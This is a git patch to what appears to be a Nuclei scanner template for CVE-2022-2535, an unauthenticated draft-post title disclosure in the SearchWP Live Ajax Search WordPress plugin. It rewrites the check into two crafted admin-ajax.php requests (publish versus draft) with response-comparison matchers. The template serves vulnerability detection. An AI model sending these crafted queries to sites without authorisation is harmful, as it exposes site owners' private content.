From 3a281e8ecf0af4ab066b56d3956572e7fa3e18c3 Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com>
Date: Mon, 20 Jan 2025 14:26:03 +0700
Subject: [PATCH] Update CVE-2022-2535.yaml

---
 http/cves/2022/CVE-2022-2535.yaml | 22 ++++++++++++++--------
 1 file changed, 14 insertions(+), 8 deletions(-)

diff --git a/http/cves/2022/CVE-2022-2535.yaml b/http/cves/2022/CVE-2022-2535.yaml
index b81dd7cef0d..f142216b136 100644
--- a/http/cves/2022/CVE-2022-2535.yaml
+++ b/http/cves/2022/CVE-2022-2535.yaml
@@ -2,7 +2,7 @@ id: CVE-2022-2535
 
 info:
   name: SearchWP Live Ajax Search < 1.6.2 - Unauthenticated Arbitrary Post Title Disclosure
-  author: r3Y3r53
+  author: r3Y3r53,daffainfo
   severity: medium
   description: |
     The plugin does not ensure that users making. alive search are limited to published posts only, allowing unauthenticated users to make a crafted query disclosing private/draft/pending post titles along with their permalink
@@ -31,15 +31,21 @@ info:
   tags: cve,cve2022,wp,wp-plugin,wordpress,wpscan,searchwp-live-ajax-search,searchwp
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft"
+  - raw:
+      - |
+        GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=publish HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - 'status_code == 200'
-          - 'contains(content_type, "text/html")'
-          - 'contains(body, "searchwp-live-search-result")'
+          - 'status_code_1 == 200 && status_code_2 == 200'
+          - 'contains(content_type_1, "text/html") && contains(content_type_2, "text/html")'
+          - 'contains(body_1, "searchwp-live-search-result") && contains(body_2, "searchwp-live-search-result")'
+          - "len(body_1) != len(body_2)"
         condition: and
-# digest: 4a0a00473045022011b6ddb96bff3d8683515d93725995406d13f48c88b94b814b59013668150c33022100d951a09e8be7f217b74b5fee347764a92897295efba1283778d30e0cf7f21aee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022011b6ddb96bff3d8683515d93725995406d13f48c88b94b814b59013668150c33022100d951a09e8be7f217b74b5fee347764a92897295efba1283778d30e0cf7f21aee:922c64590222798bb761d5b6d8e72950